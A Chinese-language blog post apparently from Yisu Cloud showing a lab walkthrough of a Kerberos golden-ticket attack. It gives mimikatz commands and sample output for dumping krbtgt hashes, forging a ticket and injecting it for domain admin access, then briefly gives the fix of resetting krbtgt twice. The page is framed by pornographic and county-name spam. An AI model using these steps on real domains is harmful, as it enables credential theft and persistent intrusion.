亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

域后續之golden ticket

發布時間:2020-06-29 14:22:57 來源:網絡 閱讀:5489 作者:z2pp 欄目:系統運維

0x00 前言


當域***成功后,域控制器已被攻陷,這時***者通常需要維持域中權限,持久控制域控制器。本文中提到的golden ticket(黃金票據)主要是利用微軟Kerberos協議缺陷和域中krbtgt賬號的信息,可生成任意TGT,該TGT可用于當前域中Kerberos認證的任何服務。***者只需要保存krbtgt賬號中的信息生成golden ticket注入內存當中,即可擁有權限,且該票據的有效期是十年。

0x01 準備工作


  1. 域控制器一臺及管理員權限(dc都沒攻陷,談何后續?)
  2. mimikatz

0x02 模擬環境


域控制器 2008r2 dc.test.com 192.168.3.100
域內機器 2008r2 client.test.com 192.168.3.10
域外機器 win7 xxxxxx.xxx 192.168.3.18

0x03 漏洞自檢


只能去翻看日志咯~~~~

0x04 漏洞利用


1. 獲取krbtgt賬號信息

包括Server SID、NTLM或aes256或aes128,在域控制器上使用mimikatz操作

C:\Users\Administrator\Desktop>mimikatz.exe "privilege::debug" "lsadump::lsa /patch" "exit"
mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::lsa /patch
Domain : TEST / S-1-5-21-1406004368-3818689962-3591297438
RID  : 000001f6 (502)
User : krbtgt
LM   : 
NTLM : 80c073620041d7cc60c36ea12bdecb5d
//只摘重點部分展示

抓取aes256,需要使用另外的命令,aes256和NTLM只需要一個即可

C:\Users\Administrator\Desktop>mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:test.com /user:krbtgt" "exit"
mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::dcsync /domain:test.com /user:krbtgt
[DC] 'test.com' will be the domain
[DC] 'dc.test.com' will be the DC server
[DC] 'krbtgt' will be the user account
Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
    Default Salt : TEST.COMkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 7a615ae0d4b62a304ab086749b87ec0933dccb62c15e9fc2ca176bd4cf5ee8c5
            aes128_hmac       (4096) : aeb64a10f1fa77b344fb873ba04fa755
      des_cbc_md5       (4096) : dcd9ec620b26f7df
      rc4_plain         (4096) : 80c073620041d7cc60c36ea12bdecb5d
2.生成golden ticket(其實也是TGT票據)

先使用NTLM來生成票據

C:\Users\Administrator\Desktop>mimikatz.exe "kerberos::golden /user:Administrator /domain:域名 /sid:SERVER SID /krbtgt:NTLM /ticket:test.kirbi" "exit"

執行后會在當前目錄生成票據,名為test.kirbi
域后續之golden ticket
aes256生成票據

C:\Users\Administrator\Desktop>mimikatz.exe "kerberos::golden /user:Administrator /domain:域名 /sid:SERVER SID /aes256:值 /ticket:xxx.kirbi" "exit"

執行后會在當前目錄生成票據,名為xxx.kirbi
aes128同256,將參數名修改和值即可/aes128:xxx

3.票據注入

分別使用兩臺機器進行測試,一臺為域內成員機器,一臺為域外成員機器,測試是否能通過票據使任意能聯通域的機器獲取到域管理權限!將票據保存到兩臺機器上

* 域內機器測試

域后續之golden ticket
!未注入票據前,域內機器不能直接訪問域控制器

mimikatz # kerberos::ptt aes256.kirbi  #xxx.kirbi為文件名

域后續之golden ticket
!注入票據后,成功訪問域控制器


* 域外機器測試

需要注意的是,域外機器先得將dns指向域控制器或域內dns服務器,否則無法解析主機名
域后續之golden ticket
可以正常解析!
域后續之golden ticket
機器不在域中
!未注入票據前,域外機器不能直接訪問域控制器
域后續之golden ticket
!注入票據后,域外機器成功訪問域控制器
域后續之golden ticket

0x05 細節


  1. 訪問時,不能使用ip地址,必須使用域名
    域后續之golden ticket
  2. 如有錯誤,請斧正,謝謝!

0x06 修復

當域被***后,不止要重置域管理員密碼,還需要重置krbtgt賬戶密碼,且需要重置兩次,才能使golden ticket失效,否則擁有golden ticket的***者將可以隨便進出域中

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

井冈山市| 正定县| 岚皋县| 开封市| 濮阳县| 日照市| 集安市| 北碚区| 双鸭山市| 桑日县| 江源县| 冷水江市| 潞城市| 柘城县| 西和县| 临西县| 台前县| 莲花县| 兖州市| 若尔盖县| 阜康市| 融水| 黄龙县| 兰州市| 仁布县| 遂平县| 报价| 孟连| 绥阳县| 芜湖市| 麦盖提县| 新邵县| 高尔夫| 赤壁市| 安平县| 龙陵县| 建宁县| 华坪县| 太谷县| 新丰县| 上高县|